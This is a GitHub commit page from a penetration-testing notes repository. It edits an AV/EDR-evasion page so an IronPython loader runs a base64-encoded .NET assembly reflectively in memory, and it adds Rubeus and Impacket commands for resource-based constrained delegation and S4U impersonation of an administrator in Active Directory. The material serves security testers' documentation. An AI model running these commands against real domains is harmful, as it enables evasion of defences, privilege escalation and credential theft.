Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
@snovvcrash
snovvcrash committed Oct 4, 2022
1 parent 9eb122c commit ca856b4
Show file tree
Hide file tree
Showing 2 changed files with 17 additions and 2 deletions.
6 changes: 4 additions & 2 deletions pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -76,14 +76,16 @@ You will need:
{% code title="loader.py" %}
```python
# ipy.exe .\loader.py

import clr

clr.AddReference('System')
from System import *
from System.Reflection import *

assembly = Assembly.LoadFrom('C:\\Tools\\Loader.exe')
b64 = '<LOADER_BYTES_B64>'
raw = Convert.FromBase64String(b64)

assembly = Assembly.Load(raw)
type = assembly.GetType('Loader.Program')
type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)
```
Expand Down
13 changes: 13 additions & 0 deletions pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -203,6 +203,8 @@ $ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 192.

- [https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)

{% tabs %}
{% tab title="Windows" %}
User **j.doe** is populated within the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the **SRV01** machine:

```
Expand Down Expand Up @@ -238,6 +240,13 @@ Go for the S4U attack providing the initial TGT within the `/ticket` option and
```
PS > .\Rubeus.exe s4u /msdsspn:host/SRV01.megacorp.local /altservice:http /ticket:<TGT> /tgs:<TGS> /createnetonly:C:\Windows\System32\cmd.exe /show
```
{% endtab %}
{% tab title="Linux" %}
From Linux systems [Impacket](https://github.com/SecureAuthCorp/impacket/pull/1202#issuecomment-1257289045) can be used to operate the technique.

The steps detailed on [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users) can be followed.
{% endtab %}
{% endtabs %}



Expand All @@ -260,6 +269,10 @@ PS > .\Rubeus.exe s4u /u2u /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /im
- [https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
- [https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync](https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync)

```
$ getST.py megacorp.local/'PC01$' -hashes :`pypykatz crypto nt 'Passw0rd!'` -dc-ip 192.168.1.11 -impersonate administrator -altservice CIFS/PC01.megacorp.local -self
```



### sAMAccountName Spoofing (noPac)
Expand Down

0 comments on commit ca856b4

Please sign in to comment.